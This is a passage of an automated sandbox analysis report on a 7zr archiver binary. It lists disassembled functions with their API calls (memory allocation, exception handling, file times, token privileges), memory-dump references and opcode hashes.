                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 2436765578-0
                            • Opcode ID: 5c9cfb2fccd9720d0adfce3002bda8aeeae5a1fe47f127ee0d3608618f727745
                            • Instruction ID: a03bb951699f477d5d14a8fd6d75c7df2ffbbfe36baa67c9304d6188b40be5bc
                            • Opcode Fuzzy Hash: 5c9cfb2fccd9720d0adfce3002bda8aeeae5a1fe47f127ee0d3608618f727745
                            • Instruction Fuzzy Hash: EAE08C7104024CBACF106FA0E8047D83F685B01395F40E026FD0C8E211C2B4C6D18744
                            Function 0071B05D Relevance: 2.2, APIs: 1, Instructions: 653COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 89762319f8213e7232e3dfa4275d7a7c1f9be7116a7aca8b98b1146d08a58373
                            • Instruction ID: c3b9a1460374c24c28dcace110f916b811f07c31c7c61662399d3e946cb9b470
                            • Opcode Fuzzy Hash: 89762319f8213e7232e3dfa4275d7a7c1f9be7116a7aca8b98b1146d08a58373
                            • Instruction Fuzzy Hash: E9527170900249DFDF11CFA8C598BEDBBB5AF49304F28409DE845AB291DB79DE85CB21
                            Function 006E6305 Relevance: 1.9, APIs: 1, Instructions: 377COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: c4bcde51a1748a7d4a88c62948bcea9d82fa344eb4f066156fc0a06a3eb1ac98
                            • Instruction ID: 0061b4ade90c1609bc54683229ec32a41bc3e5c66fcb0fc4bfc120c77d4eaec3
                            • Opcode Fuzzy Hash: c4bcde51a1748a7d4a88c62948bcea9d82fa344eb4f066156fc0a06a3eb1ac98
                            • Instruction Fuzzy Hash: A9F1BB70A067C5DFCF21CF65C490AEABBE2BF25344F14886EE49A8B351D730A944CB52
                            Function 007210D3 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: e9c3ffb555da391b3acd30526e2010a142cdcf4e9dec12960e84a037de4071de
                            • Instruction ID: 1488727b81285a2ea8dd14c9e321fa841d0513845d9ac48b80d711cf36ffdd5a
                            • Opcode Fuzzy Hash: e9c3ffb555da391b3acd30526e2010a142cdcf4e9dec12960e84a037de4071de
                            • Instruction Fuzzy Hash: 58D19B70A00755EFDB24CFA8D884BEEBBF2BF29300F50452DE85597652D778A885CB90
                            Function 0071CF91 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071CF96
                              • Part of subcall function 00721511: __EH_prolog.LIBCMT ref: 00721516
                              • Part of subcall function 00721511: _CxxThrowException.MSVCRT(?,0078D480), ref: 00721561
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID:
                            • API String ID: 2366012087-0
                            • Opcode ID: a44e641b51ed112388252e2407d264c916f46361404a545f3cd85bb5363ab5ee
                            • Instruction ID: 061a05b6f5d07f9e0c7e3c7383662b667b7b2b4d3d859eb8d07604f6f1c92cc5
                            • Opcode Fuzzy Hash: a44e641b51ed112388252e2407d264c916f46361404a545f3cd85bb5363ab5ee
                            • Instruction Fuzzy Hash: 09514071900249DFCB21DFA8C8C8BDEBBB4AF49304F1444ADE45A97242C7799E85DF21
                            Function 0070F784 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: aba103a79465eb5672b73ed8929adf4ce324c91841cd7528e08f09534b391ff2
                            • Instruction ID: 64520d52f61245625499ef7082f9e83586bec81ebf7a39a41515db25ac72f90c
                            • Opcode Fuzzy Hash: aba103a79465eb5672b73ed8929adf4ce324c91841cd7528e08f09534b391ff2
                            • Instruction Fuzzy Hash: 24514B74A00706DFCB24CF64C4809AAFBF2FF89340B108A6DD5529BB91D335A946CF90
                            Function 0071AD3A Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: aed60fb1d42b2eddc2b7be2e5714d2c1dbfbdabb9c826793eca4c62b8b131ff8
                            • Instruction ID: bcbad425555728f034469c89f4fdb067f133d571c260c8bce6b64a41a057aca3
                            • Opcode Fuzzy Hash: aed60fb1d42b2eddc2b7be2e5714d2c1dbfbdabb9c826793eca4c62b8b131ff8
                            • Instruction Fuzzy Hash: F541A070A01B46EFDB25CF68C485BAABBA0BF44310F148A6DD496876D1D374EDC5CB41
                            Function 006E4250 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E4255
                              • Part of subcall function 006E440B: __EH_prolog.LIBCMT ref: 006E4410
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 3744649731-0
                            • Opcode ID: 71eca86c77f16cad7cadbd36081c69e3135b3d60fc5e8bc74f9625dda594d083
                            • Instruction ID: 6637516e665768fc531d06e527165b47a0668b4f238d67fcc743bb21b2a08671
                            • Opcode Fuzzy Hash: 71eca86c77f16cad7cadbd36081c69e3135b3d60fc5e8bc74f9625dda594d083
                            • Instruction Fuzzy Hash: 4C51F9B0802784CFC725DF6AC18468AFBF0BF19344F5489AEC49E97752D7B4AA08CB51
                            Function 006FD0E1 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006FD0E6
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionH_prologThrowmalloc
                            • String ID:
                            • API String ID: 3978722251-0
                            • Opcode ID: 37d342a7d408d02958b59470c861b2e59db7fb3cf4256a4d6fd7f2d0226e8e45
                            • Instruction ID: a9ab074d1be761e3c8cc8093f7f3df5a6c287bf5f9bcc124a5b89f59f420d5e7
                            • Opcode Fuzzy Hash: 37d342a7d408d02958b59470c861b2e59db7fb3cf4256a4d6fd7f2d0226e8e45
                            • Instruction Fuzzy Hash: 2F41B171A00219DFCB10DBA8C9447BEBBB6BF45314F2445AAE546E7382CB70AD05CB91
                            Function 006E7FC5 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E7FCA
                              • Part of subcall function 006D950D: SysAllocStringLen.OLEAUT32(?,?), ref: 006D952C
                              • Part of subcall function 006D950D: _CxxThrowException.MSVCRT(?,007855B8), ref: 006D954A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AllocExceptionH_prologStringThrow
                            • String ID:
                            • API String ID: 1940201546-0
                            • Opcode ID: 8ad6eb0fbf84f58efa3115664c518953a93024ece71ce4ef764bea242d8b5192
                            • Instruction ID: 1286ab98c01c1ee517823aadb992cdbf02a578701bafbd0091a6e1b4b2ce9375
                            • Opcode Fuzzy Hash: 8ad6eb0fbf84f58efa3115664c518953a93024ece71ce4ef764bea242d8b5192
                            • Instruction Fuzzy Hash: 0F31A072C21289DEDF15AFA6C8519FE7772FF14300F40406EE01AA7362EE359A09C765
                            Function 0070ADB7 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070ADBC
                              • Part of subcall function 0070AD29: __EH_prolog.LIBCMT ref: 0070AD2E
                              • Part of subcall function 0070AF2D: __EH_prolog.LIBCMT ref: 0070AF32
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: ebf2d58f747a85e5f6e2d70f65a5d7076aaa1a2340e65ac18ee8cc46a750372e
                            • Instruction ID: 33c51bc3f43cfe52ff5666404dd405a64620728371489b5be54ea886732a2dd5
                            • Opcode Fuzzy Hash: ebf2d58f747a85e5f6e2d70f65a5d7076aaa1a2340e65ac18ee8cc46a750372e
                            • Instruction Fuzzy Hash: C141D87144ABC0DEC326DB78C1656C6FFE06F35200F94899EC0EA43752D674A60CC76A
                            Function 006F062E Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: c873bf82689579821f0556a091165a2d2ff59a5830666e43327bedd206c51805
                            • Instruction ID: 272957e849f25d04ba064256473a870de390d62a17bea4f3f4e0282769a09683
                            • Opcode Fuzzy Hash: c873bf82689579821f0556a091165a2d2ff59a5830666e43327bedd206c51805
                            • Instruction Fuzzy Hash: 203118B0900209DBDB14EF94C8918FEBBB6FF85360B20811DE62AA7242C7309D01CBA0
                            Function 006F98F2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F98F7
                              • Part of subcall function 006F9987: __EH_prolog.LIBCMT ref: 006F998C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: bcd2a1bf6e2555886787a5496edf3b8b9e9b1f6d5b618b71139e6fd92e45ce8d
                            • Instruction ID: cbcea6fec35859beecb438cf14c983dcd554ed4e5a4bb7338230365038469893
                            • Opcode Fuzzy Hash: bcd2a1bf6e2555886787a5496edf3b8b9e9b1f6d5b618b71139e6fd92e45ce8d
                            • Instruction Fuzzy Hash: 69117F756002099FCB14CF59C884BAAB3AAFF89350F18851CE956D7351CB71E800CB60
                            Function 006F021A Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F021F
                              • Part of subcall function 006E3D66: __EH_prolog.LIBCMT ref: 006E3D6B
                              • Part of subcall function 006E3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3D7D
                              • Part of subcall function 006E3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3D94
                              • Part of subcall function 006E3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 006E3DB6
                              • Part of subcall function 006E3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3DCB
                              • Part of subcall function 006E3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3DD5
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID:
                            • API String ID: 1532160333-0
                            • Opcode ID: b6e62d6bfb394dcf9732fbe7bf14361de1b4a72262b5ed9c6f54a751e8069573
                            • Instruction ID: a23e65bc738d85af9ba402506da167564d3bbce69ad186032249986c0cf51c55
                            • Opcode Fuzzy Hash: b6e62d6bfb394dcf9732fbe7bf14361de1b4a72262b5ed9c6f54a751e8069573
                            • Instruction Fuzzy Hash: BE2139B1846B90CFC361CF6A86D0686FFF4BB19600B94996EC0DA83B12C374A508CF55
                            Function 006F1C6F Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F1C74
                              • Part of subcall function 006D6C72: __EH_prolog.LIBCMT ref: 006D6C77
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 39c958b23af04678295625606b11ae430d99c255b2948d1f1778fcda3b641339
                            • Instruction ID: 20d18a99f88b7ec2c7073cf2996e016c21275b697fd2bbf5f8600163dad55f7e
                            • Opcode Fuzzy Hash: 39c958b23af04678295625606b11ae430d99c255b2948d1f1778fcda3b641339
                            • Instruction Fuzzy Hash: 13117931D00208DBCF59EBE4D962BEDBB77AF15394F00006EE9426B392CB655D05C6A8
                            Function 006E7E5A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E7E5F
                              • Part of subcall function 006D6C72: __EH_prolog.LIBCMT ref: 006D6C77
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                              • Part of subcall function 006D757D: GetLastError.KERNEL32(006DD14C), ref: 006D757D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ErrorLastfree
                            • String ID:
                            • API String ID: 683690243-0
                            • Opcode ID: f408212fac8cd73ba06eb207638d7e32b48f9b28e3145ce944a79e73d37f86df
                            • Instruction ID: 44b93bba9954464f0350fb93c8e5aeb79774c8f26edf1f17a09a6116cea9aad7
                            • Opcode Fuzzy Hash: f408212fac8cd73ba06eb207638d7e32b48f9b28e3145ce944a79e73d37f86df
                            • Instruction Fuzzy Hash: E6014432A413409FC721EF74C4A29DEBBB3EF45310B00462EE88353692CA34A908CA54
                            Function 0071BF8C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071BF91
                              • Part of subcall function 0071D144: __EH_prolog.LIBCMT ref: 0071D149
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: 32949ac93b10c8427cc3838d4757a93f7629f0d7d05cf2d15ccadf51a90ad6b4
                            • Instruction ID: ec7d89463131a058bbed7a5fbea5770b99aaac58cc2bf5ec2fabc6fb7c135f07
                            • Opcode Fuzzy Hash: 32949ac93b10c8427cc3838d4757a93f7629f0d7d05cf2d15ccadf51a90ad6b4
                            • Instruction Fuzzy Hash: CB11C270801714DFC721EFA4C809BCABBF9BF05344F00892DE4A797291D7B4AA04CB84
                            Function 006D7AB2 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                            Download Yara Rule
                            APIs
                            • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,006D1AD1,00000000,00000002,00000002,?,006D7B3E,?,00000000), ref: 006D7AFD
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: FileTime
                            • String ID:
                            • API String ID: 1425588814-0
                            • Opcode ID: 95ddbfb2847891354328980f3338b95792112439aa8d2568ce257f231c44dde1
                            • Instruction ID: ec8936aa92e2f713bb2ed8ea93c3e8dc13186e407c20164bbaf67764f79190c5
                            • Opcode Fuzzy Hash: 95ddbfb2847891354328980f3338b95792112439aa8d2568ce257f231c44dde1
                            • Instruction Fuzzy Hash: F401DB70504288BFEF228F54CC09BEA3FAA9B06320F14814EB8A6523E2D6609E60D755
                            Function 0070ACF8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 0070C0B8
                              • Part of subcall function 006F7193: __EH_prolog.LIBCMT ref: 006F7198
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: 4362ea76b39fcadb93e361d7dec3a2b00cc0ba2d27b69f8d28c0397f9e0a9326
                            • Instruction ID: 65b36ba7b7468c8072515b9aa529bede6e41b0b979f2c5ebc0c32139e987597b
                            • Opcode Fuzzy Hash: 4362ea76b39fcadb93e361d7dec3a2b00cc0ba2d27b69f8d28c0397f9e0a9326
                            • Instruction Fuzzy Hash: 5AF0B472900615DBD7269B99DC817AEF3EAEF54760F10423FE4029B651CBB9DC10C694
                            Function 0071035F Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00710364
                              • Part of subcall function 007101C4: __EH_prolog.LIBCMT ref: 007101C9
                              • Part of subcall function 00710143: __EH_prolog.LIBCMT ref: 00710148
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                              • Part of subcall function 007103D8: __EH_prolog.LIBCMT ref: 007103DD
                              • Part of subcall function 0071004A: __EH_prolog.LIBCMT ref: 0071004F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
